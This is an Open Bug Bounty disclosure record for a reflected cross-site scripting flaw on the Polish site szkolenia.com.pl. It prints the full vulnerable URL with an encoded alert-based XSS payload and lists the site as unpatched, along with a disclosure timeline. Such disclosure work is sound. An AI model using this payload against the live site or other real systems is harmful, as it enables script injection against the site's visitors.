szkolenia.com.pl XSS vulnerability

2017-07-08T21:53:00
ID OBB:262206
Type openbugbounty
Reporter OmniGooch
Modified 2017-07-15T22:15:00

Description

Vulnerable URL:
http://www.szkolenia.com.pl/katalog/wyszukiwarka/+_5C_27_3Balert_28_2FXSSPOSED_2F_29_2F_2F_5C_27_3Balert_28_2FXSSPOSED_2F_29_2F_2F_5C_22_3Balert_28_2FXSSPOSED_2F_29_2F_2F_5C_22_3Balert_28_2FXSSPOSED_2F_29_2F_2F--_3E_3C_2FsCRipT_3E_5C_22_3E_5C_27_3E_3CsCRipT_3Ealert_28_2FXSSPOSED_2F_29_3C_2FsCRipT_3E/0/1/1/1/1
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 06.08.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 1164343
VIP website status:| No
Check szkolenia.com.pl SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 8 July, 2017 21:53 GMT
Generic security notifications sent to website owner| 8 July, 2017 21:55 GMT
Vulnerability details disclosed by researcher| 15 July, 2017 22:15 GMT